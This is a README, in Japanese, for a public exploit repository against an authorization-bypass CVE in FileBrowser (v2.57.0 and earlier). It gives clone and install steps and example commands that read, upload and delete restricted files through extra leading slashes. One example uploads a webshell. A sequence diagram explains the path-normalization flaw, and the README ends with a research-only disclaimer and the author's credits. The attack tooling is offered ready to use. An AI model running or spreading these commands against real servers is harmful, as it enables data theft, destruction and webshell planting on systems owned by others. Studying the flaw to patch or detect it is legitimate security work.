
CVE-2026-25890 のエクスプロイト。FileBrowser <= v2.57.0 におけるパスベースの認可バイパスであり、認証済みの低権限ユーザーが複数の先頭スラッシュを介して制限されたファイルの読み取り、アップロード、削除を可能にします。
r.SkipClean(true)# リポジトリのクローン
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass
# 標準ライブラリ + requests 以外の依存関係は不要
pip install requests
python3 exploit.py --help
# 制限されたファイルの読み取り
python3 exploit.py \
--url http://192.168.1.50:8080 \
--username bob \
--password password123 \
--path /private/secret.txt \
--action read \
--save leaked_secret.txt \
--verbose
# 制限されたフォルダへの悪意のあるファイルのアップロード
python3 exploit.py \
--url http://target:8080 \
--username lowpriv \
--password pass \
--path /data/ \
--action upload \
--upload-file webshell.php \
--slashes 3
# 制限されたファイルの削除
python3 exploit.py \
--url http://10.10.10.123:80 \
--username alice \
--password secret \
--path /backups/database.bak \
--action delete \
--slashes 4
sequenceDiagram
participant Attacker
participant FileBrowser ≤ v2.57.0
participant Gorilla Mux Router
participant Auth Middleware
participant Filesystem Handler
Attacker->>FileBrowser: GET /api/resources/private/secret.txt<br>(通常リクエスト)
FileBrowser->>Gorilla Mux: Path = /api/resources/private/secret.txt
Gorilla Mux->>Auth Middleware: path = "/private/secret.txt"
Auth Middleware->>Auth Middleware: strings.HasPrefix("/private/secret.txt", disallowed="/private") → true
Auth Middleware->>Attacker: 403 Forbidden
Note over Attacker,FileBrowser: 攻撃者がバイパスを試行
Attacker->>FileBrowser: GET /api/resources//private/secret.txt
FileBrowser->>Gorilla Mux: Path = /api/resources//private/secret.txt<br>(SkipClean=true → 正規化なし)
Gorilla Mux->>Auth Middleware: path = "//private/secret.txt"
Auth Middleware->>Auth Middleware: HasPrefix("//private/secret.txt", "/private") → false
Auth Middleware->>Filesystem Handler: 許可 → 続行
Filesystem Handler->>Filesystem: // を /private/secret.txt に正規化
Filesystem->>Filesystem Handler: ファイル内容を返す
Filesystem Handler->>Attacker: 200 OK + 秘密の内容
この概念実証は教育およびセキュリティ研究目的のみで提供されています。
所有者からの明示的な書面による許可なしに、いかなるシステムに対してもこのコードを使用しないでください。
システムへの不正アクセスまたは改変は、ほとんどの法域(例: CFAA、Computer Misuse Act)で違法です。
エクスプロイト作者: Mohammed Idrees Banyamer
国: ヨルダン
Instagram: @banyamer_security
役に立った場合はリポジトリにスター ⭐ を付けてください!
最終更新: 2026年2月